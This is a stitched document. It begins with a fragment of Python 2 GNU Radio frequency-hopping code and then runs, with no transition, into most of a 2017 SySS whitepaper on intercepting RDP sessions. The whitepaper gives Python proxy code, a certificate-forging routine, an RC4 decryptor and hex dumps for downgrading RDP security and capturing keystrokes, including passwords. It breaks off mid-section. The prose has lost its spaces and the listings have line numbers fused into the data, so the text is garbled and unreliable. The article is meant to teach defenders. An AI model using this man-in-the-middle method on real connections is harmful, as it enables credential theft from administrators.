            target_freq = self.next_freq  
            self.next_freq =  self.next_freq + self.freq_step  
            if self.next_freq > self.max_center_freq:  
                self.next_freq = self.min_center_freq  
 
        if not self.set_freq(target_freq):  
            print "Failed to set frequency to", target_freq  
 
        return target_freq  
                           
    def set_freq(self, target_freq): #RX frequency  
        """ 
        Set the center frequency we're interested in.  
 
        @param target_freq: frequency in Hz  
        @rypte: bool  
 
        Tuning is a two step  process.  First we ask the front -end to 
        tune as close to the desired frequency as it can.  Then we use  
        the result of that operation and our target_frequency to  
        determine the value for the digital down converter.  
        """ 
        return self.u.tune(0, self.subdev, target_freq)  
 
    def set_gain(self, gain):  
        self.subdev.set_gain(gain)  
 
    def set_tx_freq(self, new_freq):  
        self.tx_freq = new_freq  
        self.usink.set_frequency(self.tx_freq)  
     
    def set_new_ran dom_tx_freq(self):  
        x = random.randint(0,4)  
        while x == self.curr_tx_ch:  
            x = random.randint(0,4)  
        self.set_tx_freq(self.min_center_freq + x*self.freq_step)  
        self.curr_tx_ch = x  # current TX channel, between 0 and 4  
         
    def hop_to_new_band(self):  
        x = random.randint(0,4)  
        while x == self.band:  
            x = random.randint(0,4)  
        self.min_center_freq = 900e6 + x*20e6 + self.freq_step/2  
        self.max_center_freq = self.min_center_freq +  16e6 
        self.next_freq = self.min_center_freq  
        self.band = x  # current TX channel, between 0 and 4  
        self.set_new_random_tx_freq()  
        self.set_amp()  
         
    def set_amp(self):  
        if self.band == 0: self.amp = 10; self.thr eshold = 8e9  
        # different thresholds used because of variations in signal strength  
        #   due to antenna and USRP  
        elif self.band == 1: self.amp = 10; self.threshold = 8e9  
        elif self.band == 2: self.amp = 10; self.threshold = 8e9  
        elif self.band == 3: self.amp = 10; self.threshold = 8e9  
        elif self.band == 4: self.amp = 10; self.threshold = 8e9  
        self.sig_src.set_amplitude(self.amp)  
 
 
def main_loop(tb):  
    i = 0 
    tb.set_amp()  
    while 1:  
 
        # Get the n ext message sent from the C++ code (bin_statistics)  
        # It contains the center frequency and the mag squared of the fft  
 
        m = parse_msg(tb.msgq.delete_head()) # This is a blocking call.  
 
        # Print center freq so we know that something is  happening...  
        print "New center frequency: %0.1f" % (m.center_freq)  
      
        # FIXME do something useful with the data...  
         
        # m.data are the mag_squared of the fft output (they are in the  
        # standard order.  I.e., bin 0 = = DC.) 
        # m.raw_data is a string that contains the binary floats.  
        # You could write this as binary to a file.  
         
        i += 1 
        if i == 40: # this counter is used to slow down the rate the transmission frequency 
changes 
            i = 0 
            tb.set_new_random_tx_freq()  
         
        y = 0 
        for x in m.data:  
            y += x 
        avg_energy = y / tb.fft_size  
        if avg_energy > tb.threshold:  
            print "*******************************%0.1f is > %d" % (avg_energy, tb.threshold)  
            tb.hop_to_new_band()  
 
     
if __name__ == '__main__':  
    tb = my_top_block()  
    try: 
        tb.start()        # start executing flow graph in anoth er thread, and return the control 
to the python program  
        main_loop(tb)  
         
    except KeyboardInterrupt:  
        pass 
 Adrian Vollmer
ATTACKING RDP
How to Eavesdrop on Poorly Secured RDP Connections
 
March 2017IT SECURITY KNOW-HOW
©SySSGmbH,March2017
Wohlboldstraße8,72072Tübingen,Germany
+49(0)7071-407856-0
info@syss.de
www.syss.de
Vollmer| AttackingRDP 1
Introduction
TheRemoteDesktopProtocol(RDP)isusedbysystemadministratorseverydaytologontoremoteWindows
machines. Perhapsmostcommonly,itisusedtoperformadministrativetasksoncriticalserverssuchasthe
domaincontrollerwithhighlyprivilegedaccounts,whosecredentialsaretransmittedviaRDP.Itisthusvitalto
useasecureRDPconfiguration.
We at SySS regularly observe that due to misconfigurations, system administrators in an Active Directory
environmentareroutinelypresentedwith(andignore)certificatewarningslikethis:
Figure1:AnSSLcertificatewarning
Ifwarningsliketheseareacommonoccurrenceinyourenvironment,youwillnotbeabletorecognizeareal
man-in-the-middle(MitM)attack.
Thisarticlewaswrittentoraiseawarenessofhowimportantitistotakecertificatewarningsseriouslyandhow
tosecurelyconfigureyourWindowslandscape. Theintendedaudienceissystemadministrators,penetration
testersandsecurityenthusiasts. Whilenotnecessary,itisrecommendedthatyouhaveafirmunderstanding
ofthefollowingsubjects:
–Publickeycryptographyaswellassymmetriccryptography(RSAandRC4)
–SSL
–x509certificates
–TCP

2 Vollmer|AttackingRDP
–Python
–Hexadecimalnumbersandbinarycode
WewilldemonstratehowaMitMcansniffyourcredentialsifyouaren’tcareful. Noneofthisisparticularly
new–itevenhasbeendonebefore,forexamplebyCain[ 2]. However,Cainisratherold,closedsourceand
onlyavailableforWindows. WewanttoanalyzeallthegorydetailsandrelevantinnerworkingsofRDPand
simulatearealattackonitascloselyaspossible.
Itshouldgowithoutsayingthatthefindingsinthisarticlemustnotbeusedtogainunauthorizedaccesstoany
systemyoudonotown. Theymayonlybeusedforeducationalpurposeswiththefullconsentofthesystems’
owner. Otherwise,youwillmostlikelybreakthelawdependingonyourjurisdiction.
Fortheimpatient,thelinktothesourcecodecanbefoundat[ 1].
AFirstLookattheProtocol
Let’sfireupWiresharkandseewhathappenswhenweconnecttoaserverviaRDP:
Figure2:ThebeginningofanRDPsessioninWireshark
As we can see, the client starts with a suggestion of security protocols to use for the RDP session. We
differentiatethesethreeprotocols:
–StandardRDPsecurity
–EnhancedRDPsecurityorTLSsecurity
–CredSSP
Vollmer| AttackingRDP 3
In this case, the client is capable of the first two protocols. Note that standard RDP security is always
possibleanddoesnotneedtobeadvertisedbytheclient. TLS,or“enhancedRDPsecurity”,issimplystandard
RDP security wrapped inside an encrypted TLS tunnel. By the way, I will be using the terms SSL and TLS
interchangeablythroughoutthisarticle.
CredSSPisalsoinsideanTLStunnel,butinsteadoftransmittingthepasswordintheprotectedtunnel,NTLM
orKerberosisusedforauthentication. ThisprotocolisalsoreferredtoasNetworkLevelAuthentication(NLA).
Earlyuserauthenticationisafeaturethatallowstheservertodenyaccessevenbeforeanycredentials(except
fortheusername)havebeensubmitted,forexampleiftheuserdoesnothavethenecessaryremoteaccess
privileges.
InourWiresharksession,wecanseethatanSSLhandshakeisperformedafterclientandserverhaveagreed
onusingenhancedRDPsecurity. Forthis,werightclickonthefirstpacketafterthenegotiationpackets,and
decodetheTCPstreamasSSL:
Figure3:ThebeginningofanSSLhandshake
SoifwewanttoMitManRDPconnection,wecannotsimplyuseanSSLproxy,becausetheproxyneedstobe
awareoftheRDP.ItneedstorecognizewhentoinitiatetheSSLhandshake,similarlytoStartTLSinSMTPor
FTP.WechoosePythontoimplementsuchaproxy. Forthiswesimplycreateaserversocketthatthevictim’s
clientconnectsto,andaclientsocketthatconnectstotheactualserver. Weforwardthedatabetweenthese
socketsandwraptheminanSSLsocket,ifnecessary. Ofcourse,wewillbecloselyinspectingandpossibly
modifyingsaiddata.
Thefirstthingwewillwanttomodifyistheclient’sprotocolcapabilities. Theclientmaywanttotelltheserver
thatitcandoCredSSP,butwewillchangethatonthewaytotheservertostandardRDPsecurity. Andinthe
defaultconfiguration,theserverwillhappilycomply.

4 Vollmer|AttackingRDP
BuildingaPythonMitMproxyforRDP
ThemainloopofourPythonscriptwillroughlylooklikethis:
1def run():
2open_sockets()
3handle_protocol_negotiation()
4if not RDP_PROTOCOL == 0:
5 enableSSL()
6while True:
7 if not forward_data():
8 break
9
10
11def forward_data():
12readable, _, _ = select.select([local_conn, remote_socket], [], [])
13for s_in in readable:
14 if s_in == local_conn:
15 From = "Client"
16 to_socket = remote_socket
17 elif s_in == remote_socket:
18 From = "Server"
19 to_socket = local_conn
20 data = s_in.recv(4096)
21 if len(data) == 4096:
22 while len(data)%4096 == 0:
23 data += s_in.recv(4096)
24 if data == b"": return close()
25 dump_data(data, From=From)
26 parse_rdp(data, From=From)
27 data = tamper_data(data, From=From)
28 to_socket.send(data)
29return True
30
31
32def enableSSL():
33global local_conn
34global remote_socket
35print("Enable SSL")
36local_conn = ssl.wrap_socket(
37 local_conn,
38 server_side=True,
39 keyfile=args.keyfile,
40 certfile=args.certfile,
41)
42remote_socket = ssl.wrap_socket(remote_socket)
Vollmer| AttackingRDP 5
The function run()opens the sockets, handles the protocol negotiation and enables SSL, if necessary.
Afterwards,thedataissimplybeingforwardedbetweenthetwosockets. The dump_data() functionprints
thedataasahexdumptothescreenifthedebugflagisset. parse_rdp() extractsinterestinginformation
fromthatdata,and tamper_data() mightmakemodificationstoit.
Basiccryptography
BecausewewillneeditforbreakingstandardRDPsecurity,IwanttoquicklycoverthebasicsofRSA.Youcan
skipthissectionifyouwant.
InRSA,encryption,decryptionandsigningarepurelymathematicaloperationsandworkonsimpleintegers.
Justkeepinmindthatalloftheseoperationsareperformedonfinitegroups[ 3].
WhenyougenerateanRSAkeypair,youneedtofindtwolargeprimenumbers, pandq. Youtaketheirproduct,
n=pq(thisiscalledthemodulus),compute φ(n)=(p−1)(q−1)(theEulertotientfunction)andchoose
aninteger ethatisco-primeto φ(n). Thenyouneedtofindthenumber dthatsatisfies
e·d≡1 mod φ(n).
The number dis the private key while eandnmake up the public key. Of course, theoretically dcan be
reconstructed from nande, butφ(n)is very hard to compute unless you know pandq. That is why the
securityofRSAdependscruciallyonthedifficultyoffactoringlargenumbers. Sofar,nooneknowshowto
factorlargenumbersefficiently–unlessyouhaveaworkingquantumcomputer[ 4,5].
Toencryptamessage m,weraiseittothepower emodulo n:
c≡memod n
Todecryptaciphertext c,wedothesamewiththeprivateexponent d:
m≡cdmod n
Ifitisnotobvioustoyouthatthisisreallytheinverseoperationtoencrypting,don’tworry. Whilethemath
checksout,it’sjustalittletoocomplicatedforthisarticle.
Signingisthesameasdecrypting. Youjustperformitonthehashofamessage.
Becausetheseoperationscanbequiteexpensiveif morcaremuchlargerthan256bitorso,youtypically
onlyuseRSAtoencryptsymmetrickeys. Theactualmessageisthenencryptedbyusingasymmetriccipher
(typicallyAES)withafreshlygeneratedkey.

6 Vollmer|AttackingRDP
BreakingstandardRDPsecurity
Actually,thereisnotmuchtobreak. Itisalreadycompletelybrokenbydesign,andIwilltellyouwhy.
ThewaystandardRDPsecurityworksisthis:
–TheclientannouncesitsintentiontousethestandardRDPsecurityprotocol.
–The server agrees and sends its own RSA public key along with a “Server Random” to the client. The
collectionofthepublickeyandsomeotherinformation(suchasthehostname,etc.) iscalleda“certificate”.
ThecertificateissignedusingtheTerminalServicesprivatekeytoensureauthenticity.
–The client validates the certificate by using the Terminal Services public key. If successful, it uses the
server’spublickeytoencryptthe“ClientRandom”andsendsittotheserver.
–TheserverdecryptstheClientRandomwithitsownprivatekey.
–Bothserverandclientderivethesessionkeys[ 6]fromtheServerRandomandtheClientRandom. These
keysareusedforsymmetricallyencryptingtherestofthesession.
Notethatallofthishappensinplaintext,notinsideanSSLtunnel. Thatisfineinprinciple,Microsoftsimply
triedtoimplementthesametechniqueswhichSSLemploysthemselves. However,cryptographyishard[ 7],
and as a general rule, you should always rely on established solutions that stood the test of time instead
ofimplementingyourown. AndMicrosoftpromptlymadeacardinalmistake. ItissoobviousthatIcannot
understandwhytheydiditlikethat.
Canyouspotthemistakehere? HowdoestheclientgettheTerminalServicespublickey? Theansweris:
Itcomespre-installed. That means it is the same key on every system. And thatmeans the private key
isalsoalways the same! So it can be extracted from any Windows installation. In fact, we don’t even
needtodothat,sincebynowMicrosofthasdecidedtoofficiallypublishitandwecansimplylookitupat
microsoft.com [8].
Afterthesessionkeyshavebeenderived,thesymmetricencryptioncanbedoneonseverallevels[ 9]: None,
40bitRC4,56bitRC4,128bitRC4,or3DES(whichtheycallFIPS).Thedefaultis128bitRC4(“High”). Butif
wecaneavesdroponthekey,itdoesnotmatterhowstrongtheencryptionisatall.
Sotheplanisclear: Whenencounteringtheserver’spublickey,wequicklygenerateourownRSAkeypairof
thesamesizeandoverwritetheoriginalkeywithit. Ofcourse,weneedtogenerateasignatureofourpublic
keyusingtheTerminalServicesprivatekeyandreplacetheoriginalsignaturewithit. Then,aftertheclient
successfullyvalidatesourboguspublickey,wereceiveitsClientRandom. Wedecryptitusingourprivatekey,
writeitdownforlaterandreencryptitusingtheserver’spublickey. That’sit! Fromthenonwecanpassively
readtheencryptedtrafficbetweenclientandserver.
TheonlychallengeistoproperlyparsetheRDPpackets. Hereistheonethatweareinterestedin:
1From server:
200000000: 03 00 02 15 02 F0 80 7F 66 82 02 09 0A 01 00 02 ........f.......
300000010: 01 00 30 1A 02 01 22 02 01 03 02 01 00 02 01 01 ..0...".........
400000020: 02 01 00 02 01 01 02 03 00 FF F8 02 01 02 04 82 ................
500000030: 01 E3 00 05 00 14 7C 00 01 2A 14 76 0A 01 01 00 ......|..*.v....
600000040: 01 C0 00 4D 63 44 6E 81 CC 01 0C 10 00 04 00 08 ...McDn.........
700000050: 00 00 00 00 00 01 00 00 00 03 0C 10 00 EB 03 04 ................
800000060: 00 EC 03 ED 03 EE 03 EF 03 02 0C AC 01 02 00 00 ................
Vollmer| AttackingRDP 7
900000070: 00 02 00 00 00 20 00 00 00 78 01 00 00 D9 5E A3 ..... ...x....^.
1000000080: AA D6 F6 80 EB 0B 3E 1D 8D 30 B3 AB 6A AE 26 07 ......>..0..j.&.
1100000090: EF 89 3D CB 15 98 AE 22 7E 4B 2B AF 07 01 00 00 ..=...."~K+.....
12000000A0: 00 01 00 00 00 01 00 00 00 06 00 1C 01 525341............. RSA
13000000B0: 310801000000080000FF0000000100011...............
14000000C0: 00AF92E820ACD5F7BB9FCF6F6E2C6307..........on,c.
15000000D0: 34CCA77A21AB298A1B5DFEFD43F110FC4..z!.)..]..C...
16000000E0: DBC6D64BF1B7E1B95EF7684658EF0939...K....^.hFX..9
17000000F0: 08030F540C58FA3EA34A50F691E941F8...T.X.>.JP...A.
1800000100: 891DCC143C640B1D2B0C98DF63D6A672....<d..+...c..r
1900000110: 42EDACCB88448547D38945BABD9F2DD0B....D.G..E...-.
2000000120: D50E2409AD022B9D3718DD128BF6215B..$...+.7.....![
2100000130: 204733529C0032BAE783807FAA3CF3C7G3R..2......<..
2200000140: 95DD84C24E5E0C275274FC870E10D942....N^.'Rt.....B
2300000150: 190DF577573F714F9C340F12F8E8B059...wW?qO.4.....Y
2400000160: F7CD09F9A525AE6ACBE6CB8824DAD246.....%.j....$..F
2500000170: 422121942E6D42FF9FAF89E3BAECCCDAB!!..mB.........
2600000180: 15715D17A95A0059D4ADEAE49358065B.q]..Z.Y.....X.[
2700000190: F7222A1FDDDCC627302A2510B1A84098."*....'0*%... @.
28000001A0: 6B24B64E2A79B74027F4BE0735805048k$.N*y.@'...5.PH
29000001B0: 72A40D2BAAB05C89C0962A491EBCA1ABr..+..\...* I....
30000001C0: D0000000000000000008 00 48 00 3D 5F 11 ......... ..H.=_.
31000001D0: A1 C1 38 09 1B B1 85 52 1E D1 03 A1 1E 35 E7 49 ..8....R.....5.I
32000001E0: CC 25 C3 3C 6B 98 77 C2 87 03 C4 F5 78 09 78 F1 .%.<k.w.....x.x.
33000001F0: 43 21 07 BD AB EE 8E B0 F6 BC FC B0 A6 6A DD 49 C!...........j.I
3400000200: A0 F1 39 86 FE F1 1E 36 3C CE 69 C0 62 00 00 00 ..9....6<.i.b...
3500000210: 00 00 00 00 00 .....
Ihighlightedthebytesthatrepresentthepublickey. Thetwobytesdirectlyprecedingitrepresentitslengthin
little-endianbyteorder( 0x011c). Aswediscussedbefore,thepublickeyconsistsofthemodulusandthe
publicexponent. ReadtheRDPspecifications[ 10]forthedetailsonthisdatastructure.
Let’slookattheinformationthatisofinteresttous. Here,themodulusis:
100000000: AF92 E820 ACD5 F7BB 9FCF 6F6E 2C63 0734 ... ......on,c.4
200000010: CCA7 7A21 AB29 8A1B 5DFE FD43 F110 FCDB ..z!.)..]..C....
300000020: C6D6 4BF1 B7E1 B95E F768 4658 EF09 3908 ..K....^.hFX..9.
400000030: 030F 540C 58FA 3EA3 4A50 F691 E941 F889 ..T.X.>.JP...A..
500000040: 1DCC 143C 640B 1D2B 0C98 DF63 D6A6 7242 ...<d..+...c..rB
600000050: EDAC CB88 4485 47D3 8945 BABD 9F2D D0D5 ....D.G..E...-..
700000060: 0E24 09AD 022B 9D37 18DD 128B F621 5B20 .$...+.7.....![
800000070: 4733 529C 0032 BAE7 8380 7FAA 3CF3 C795 G3R..2......<...
900000080: DD84 C24E 5E0C 2752 74FC 870E 10D9 4219 ...N^.'Rt.....B.
1000000090: 0DF5 7757 3F71 4F9C 340F 12F8 E8B0 59F7 ..wW?qO.4.....Y.
11000000A0: CD09 F9A5 25AE 6ACB E6CB 8824 DAD2 4642 ....%.j....$..FB
12000000B0: 2121 942E 6D42 FF9F AF89 E3BA ECCC DA15 !!..mB..........
13000000C0: 715D 17A9 5A00 59D4 ADEA E493 5806 5BF7 q]..Z.Y.....X.[.
14000000D0: 222A 1FDD DCC6 2730 2A25 10B1 A840 986B "*....'0*%...@.k
15000000E0: 24B6 4E2A 79B7 4027 F4BE 0735 8050 4872 $.N*y.@'...5.PHr

8 Vollmer|AttackingRDP
16000000F0: A40D 2BAA B05C 89C0 962A 491E BCA1 ABD0 ..+..\...*I.....
1700000100: 0000 0000 0000 0000 ........
Thesignatureis:
100000000: 3D5F 11A1 C138 091B B185 521E D103 A11E =_...8....R.....
200000010: 35E7 49CC 25C3 3C6B 9877 C287 03C4 F578 5.I.%.<k.w.....x
300000020: 0978 F143 2107 BDAB EE8E B0F6 BCFC B0A6 .x.C!...........
400000030: 6ADD 49A0 F139 86FE F11E 363C CE69 C062 j.I..9....6<.i.b
500000040: 0000 0000 0000 0000 ........
AndtheServerRandomis:
100000000: D95E A3AA D6F6 80EB 0B3E 1D8D 30B3 AB6A .^.......>..0..j
200000010: AE26 07EF 893D CB15 98AE 227E 4B2B AF07 .&...=...."~K+..
Allinlittle-endianbyteorder. WetakenoteoftheServerRandomandreplacetheothertwovalues.
TogenerateourRSAkey,wewilluse openssl. IknowthatthereisaPythonlibraryforRSA,butitismuch
slowerthan openssl.
1$ openssl genrsa 512 | openssl rsa -noout -text
2Generating RSA private key, 512 bit long modulus
3.....++++++++++++
4..++++++++++++
5e is 65537 (0x010001)
6Private-Key: (512 bit)
7modulus:
800:f8:4c:16:d5:6c:75:96:65:b3:42:83:ee:26:f7:
9e6:8a:55:89:b0:61:6e:3e:ea:e0:d3:27:1c:bc:88:
1081:48:29:d8:ff:39:18:d9:28:3d:29:e1:bf:5a:f1:
1121:2a:9a:b8:b1:30:0f:4c:70:0a:d3:3c:e7:98:31:
1264:b4:98:1f:d7
13publicExponent: 65537 (0x10001)
14privateExponent:
1500:b0:c1:89:e7:b8:e4:24:82:95:90:1e:57:25:0a:
1688:e5:a5:6a:f5:53:06:a6:67:92:50:fe:a0:e8:5d:
17cc:9a:cf:38:9b:5f:ee:50:20:cf:10:0c:9b:e1:ee:
1805:94:9a:16:e9:82:e2:55:48:69:1d:e8:dd:5b:c2:
198a:f6:47:38:c1
20prime1:
21[...]
Herewecanseethemodulus n,thepublicexponent eandtheprivateexponent d. Theirrepresentationisin
base16usingthebig-endianbyteorder. Weactuallyneeda2048bitkeyandnot512,butyougettheidea.
Forgingthesignatureiseasy. WetaketheMD5hashofthefirstsixfieldsofthecertificate,addsomeconstants
accordingtothespecifications[ 11]andencryptitwiththe privatepartoftheTerminalServiceskey[ 8]. Thisis
howitisdoneinPython:
Vollmer| AttackingRDP 9
1def sign_certificate(cert):
2"""Signs the certificate with the private key"""
3m = hashlib.md5()
4m.update(cert)
5m = m.digest() + b"\x00" + b"\xff"*45 + b"\x01"
6m = int.from_bytes(m, "little")
7d = int.from_bytes(TERM_PRIV_KEY["d"], "little")
8n = int.from_bytes(TERM_PRIV_KEY["n"], "little")
9s = pow(m, d, n)
10return s.to_bytes(len(crypto["sign"]), "little")
ThenextmessageweneedtointerceptistheonecontainingtheencryptedClientRandom. Itlookssomething
likethis:
1From client:
200000000: 03 00 01 1F 02 F0 80 64 00 08 03 EB 70 81 10 01 .......d....p...
300000010: 02 00 00 08 01 00 00 DD8A4335DD1A129944.........C5....D
400000020: A13EF5385CDB3F3F40D1EDC4A93B606A.>.8\.?? @....;`j
500000030: A6105AAFFD177A214369D0F89BF121A3..Z...z!Ci....!.
600000040: F149C680960362BF43549D384D68758C.I....b.CT.8Mhu.
700000050: EAA169232FF6E93BE7E048A1B86BE2D7..i#/..;..H..k..
800000060: E249B1B21BBFBAD9650B345AB010736E.I......e.4 Z..sn
900000070: 4F15FAD704CA5CE5E28787ED550F0045O.....\..... U..E
1000000080: 652CC61A4C096F274454FEB6021CBA9Fe,..L.o'DT......
1100000090: 3BD8D08DA5E693450C9B68365C931679;......E..h6\..y
12000000A0: 0BB819BF88085DAC19857CBBAA66C4D9......]...|.. f..
13000000B0: 8EC311EDF38D27608A08E0B1201D089A......'`.... ...
14000000C0: 97446D33230E5C73D4024C20975CC9F6.Dm3#.\s..L.\..
15000000D0: 6D31B270353937A4C25262C75A695444m1.p597..Rb.ZiTD
16000000E0: 4C4A75D263CC52158F6E2AD80D61A50ALJu.c.R..n*..a..
17000000F0: 475B2A68977B1BFFD3331049159AD62CG[*h.{...3.I...,
1800000100: DF046D93217832988B0BF40133FBCC5B..m.!x2.....3..[
1900000110: 83BA2D7FEA823B0000000000000000..-...;........
Again,IhighlightedtheencryptedClientRandom. Thefourbytesprecedingitrepresentitslength( 0x0108).
Sinceithasbeenencryptedwithourcertificate,wecaneasilydecryptit:
100000000: 4bbd f97d 49b6 8996 ec45 0ce0 36e3 d170 K..}I....E..6..p
200000010: 65a8 f962 f487 5f27 cd1f 294b 2630 74e4 e..b.._'..)K&0t.
Wejustneedtoreencryptitusingtheserver’spublickeyandsubstituteitintheanswerbeforepassingiton.
Unfortunately, we are not quite done. We now know the secret Client Random, but for whatever reason
Microsoftdecidedtonotjustusethatasthesymmetrickey. Thereisanelaborateprocedure[ 6]toderivean
encryptionkeyfortheclient,anencryptionkeyfortheserverandasigningkey. Itisboringbutstraightforward.
After wederivethe session keys, we can initialize the s-boxes for the RC4 streams. Since RDPis using a
separatekeyformessagesfromtheserverthanformessagesfromtheclient,weneedtwos-boxes. Thes-box

10 Vollmer|AttackingRDP
isanarrayof256byteswhichareshuffledinacertainwaythatdependsonthekey. Thenthes-boxproduces
astreamofpseudorandomnumbers,whichisxor-edwiththedatastream. MyPythonimplementationlooks
likethis:
1class RC4(object):
2def __init__(self, key):
3 x = 0
4 self.sbox = list(range(256))
5 for i in range(256):
6 x = (x + self.sbox[i] + key[i % len(key)]) % 256
7 self.sbox[i], self.sbox[x] = self.sbox[x], self.sbox[i]
8 self.i = self.j = 0
9 self.encrypted_packets = 0
10
11
12def decrypt(self, data):
13 out = []
14 for char in data:
15 self.i = (self.i + 1) % 256
16 self.j = (self.j + self.sbox[self.i]) % 256
17 self.sbox[self.i], self.sbox[self.j] = (
18 self.sbox[self.j],
19 self.sbox[self.i]
20 )
21
22 out.append(char ^ self.sbox[(
23 self.sbox[self.i] +
24 self.sbox[self.j]) % 256
25 ])
26 self.encrypted_packets += 1
27 if self.encrypted_packets >= 4096:
28 self.update_key()
29 return bytes(bytearray(out))
30
31def update_key(self):
32 print("Updating session keys")
33 # TODO finish this
Asyoucansee,theprotocolrequiresthekeytoberefreshedafter4096encryptedpackets. Ihaven’tbothered
toimplementitbecauseIamonlyinterestedinthecredentialsasaproof-of-conceptanyway. Feelfreetosend
meapatch!
Nowwehaveeverythingweneedtoreadalltraffic. Weareparticularlyinterestedinpacketsthatcontain
information about keyboard input events, i.e. key presses and key releases. What I gathered from the
specification[ 12]isthatthemessagescancontainseveralpackets,andthatthereareslowpathpackets(start
with0x03)andfastpathpackets(firstbyteisdivisiblebyfour).
Vollmer| AttackingRDP 11
Akeyboardinputevent[ 13]consistsoftwobytes,forexample:
100000000: 01 1F ..
Thiswouldmeanthatthe“S”key( 0x1F)hasbeenreleased(becausethefirstbyteis 0x01).
I’mnotdoingaverygoodjobatparsingthose,becausesometimesmousemovementeventswillbedetected
askeyboardevents. Also,thescancodeneedstobetranslatedtoavirtualkeycode,whichdependsonthe
keyboard type and keyboard layout. This seems highly non-trivial, so I’m not doing it. I just use the map
referencedat[ 14]. Itisgoodenoughforaproof-of-concept.
Let’stryitout. UponconnectingtoourbogusRDPserver,wealreadygetawarningthattheserver’sauthenticity
cannotbeverified:
Figure4:Theserver’sidentitycannotbeverified...
Noticesomething? It’snotanSSLwarning. Anyway,wecannowseethekeypresses(seeFigure 5).
Bytheway,thisiswhatCainisdoing.
BreakingenhancedRDPsecurity
Tome,downgradingtostandardRDPsecurityisunsatisfactory. IfIwereanattacker,Iwouldtrytomakethe
attacklookasinconspicuousaspossible. Thevictimwillnoticeadifferentwarningthanusualandthatithas
toentertheircredentialsaftertheconnectionhasalreadybeenestablished.
ItalwaysbuggedmethatIdon’tseethesameSSLwarningwhenIMitMtheRDPconnectionwithCain. Ifind
ithardtoexplaintoacustomerwhytheyhavetotakeSSLwarningsseriously,especiallyiftheyuseself-signed
certificateswhichcannotpossiblybeverified,ifthisMitMtoolcausesacompletelydifferentwarningtobe
shown.

12 Vollmer|AttackingRDP
Figure5:Keyboardinputeventsincleartext. Thepasswordis Secr3t!
Solet’strytodowngradetheconnectiontoenhancedRDPsecurity. Forthis,weneedourownself-signedSSL
certificate,whichcanbegeneratedby openssl:
1$ openssl req -new -newkey rsa:"$KEYLENGTH" -days "$DAYS" -nodes -x509 \
2-subj "$SUBJ" -keyout privatekey.key -out certificate.crt 2> /dev/null
WewrapourPythonTCPsocketsinsideSSLsocketsattherighttimeandwearedone. Isaidearlierthat
thestandardRDPprotocolisbeingusedinsidetheSSLtunnel,buttheserveralwayschooses“None”asthe
encryptionlevel. That’sfine,sinceitcanbesafelyassumedthattheSSLwrapperensurestheauthenticityand
integrityofthedata. UsingRC4ontopofSSLisaneedlesswasteofresources. Theextractionofkeystrokes
worksexactlylikeintheprevioussection.
Theonlyextrasecurityfeatureisconsistsoftheserverconfirmingtheoriginalprotocolnegotiationrequest.
AftertheSSLconnectionhasbeenestablished,theserversaystotheclient: “Bytheway,youtoldmethese
werethesecurityprotocolsyouarecapableof.” Inbinary,itlookslikethis:
1From server:
200000000: 03 00 00 70 02 F0 80 7F 66 66 0A 01 00 02 01 00 ...p....ff......
300000010: 30 1A 02 01 22 02 01 03 02 01 00 02 01 01 02 01 0..."...........
400000020: 00 02 01 01 02 03 00 FF F8 02 01 02 04 42 00 05 .............B..
500000030: 00 14 7C 00 01 2A 14 76 0A 01 01 00 01 C0 00 4D ..|..*.v.......M
600000040: 63 44 6E 2C 01 0C 10 00 04 00 08 00 0100 00 00 cDn,........ ....
Vollmer| AttackingRDP 13
700000050: 01 00 00 00 03 0C 10 00 EB 03 04 00 EC 03 ED 03 ................
800000060: EE 03 EF 03 02 0C 0C 00 00 00 00 00 00 00 00 00 ................
Theclientcanthencomparethisvaluewithwhatitoriginallysentintheveryfirstrequestandterminatethe
connectionifitdoesn’tmatch. Obviously,itisalreadytoolate. Weareinthemiddleandcanhidetheforged
negotiation request from the client by replacing the right byte (highlighted above at offset 0x4C) with its
originalvalue(inthiscase 0x03).
Afterthat,wecanreadeverythingintheclear. Goaheadandtryitout.
Asexpected,thevictimseesaproperSSLwarning. Butsomethingisstilldifferent. Insteadofbeingprompted
for our credentials before the RDP connection is established, the victim is faced with the Windows logon
screen. UnlikewithNLA,authenticationhappensinsidethesession. Again,thatissomethingthatisdifferent
fromthetypicalworkflowofanadminandcouldbenoticed.
BreakingCredSSP
Okay,I’lladmititrighthere: WearenotgoingtobreakCredSSP.Butwe’llfindawaytocircumventit.
First,let’sseewhathappensifwedon’tdowngradetheconnectionatall. Therelevantmessagetotheserver
isthisone:
1From client:
200000000: 30 82 02 85 A0 03 02 01 04 A1 82 01 DA 30 82 01 0............0..
300000010: D6 30 82 01 D2 A0 82 01 CE 04 82 01 CA 4E 54 4C .0...........NTL
400000020: 4D 53 53 50 00 03 00 00 00 18 00 18 00 74 00 00 MSSP.........t..
500000030: 00 2E 01 2E 01 8C 00 00 00 08 00 08 00 58 00 00 .............X..
600000040: 00 0A 00 0A 00 60 00 00 00 0A 00 0A 00 6A 00 00 .....`.......j..
700000050: 00 10 00 10 00 BA 01 00 00 35 82 88 E2 0A 00 39 .........5.....9
800000060: 38 00 00 00 0F 6D 49 C4 55 46 C0 67 E4 B4 5D 86 8....mI.UF.g..].
900000070: 8A FC 3B 59 94 52 00 44 00 31 00 34 00 55 00 73 ..;Y.R.D.1.4.U.s
1000000080: 00 65 00 72 00 31 00 57 00 49 00 4E 00 31 00 30 .e.r.1.W.I.N.1.0
1100000090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
12000000A0: 00 00 00 00 00 00 00 00 00 110D658E927F07......... ..e....
13000000B0: 7B0402040CC1A6B6EF01010000000000{...............
14000000C0: 00D5FDA87CEC95D201A7559D44F43184....|..... U.D.1.
15000000D0: 8A000000000200080052004400310034......... R.D.1.4
16000000E0: 00010008004400430030003100040014.....D.C.0.1....
17000000F0: 0072006400310034002E006C006F0063.r.d.1.4...l. o.c
1800000100: 0061006C0003001E0064006300300031.a.l.....d.c.0.1
1900000110: 002E0072006400310034002E006C006F...r.d.1.4...l. o
2000000120: 00630061006C00050014007200640031.c.a.l.....r. d.1
2100000130: 0034002E006C006F00630061006C0007.4...l.o.c.a.l..
2200000140: 000800D5FDA87CEC95D2010600040002......|.........
2300000150: 00000008003000300000000000000000.....0.0........
2400000160: 000000002000004CFA6E96109BD90F6A......L.n.....j
2500000170: 4080DAAA8E264E4EBFAFFAE9E368AF78@....&NN.....h.x

14 Vollmer|AttackingRDP
2600000180: 7F53E389D96B180A0010000000000000.S...k..........
2700000190: 000000000000000000000009002C0054.............,. T
28000001A0: 00450052004D005300520056002F0031.E.R.M.S.R.V./.1
29000001B0: 00390032002E003100360038002E0034.9.2...1.6.8...4
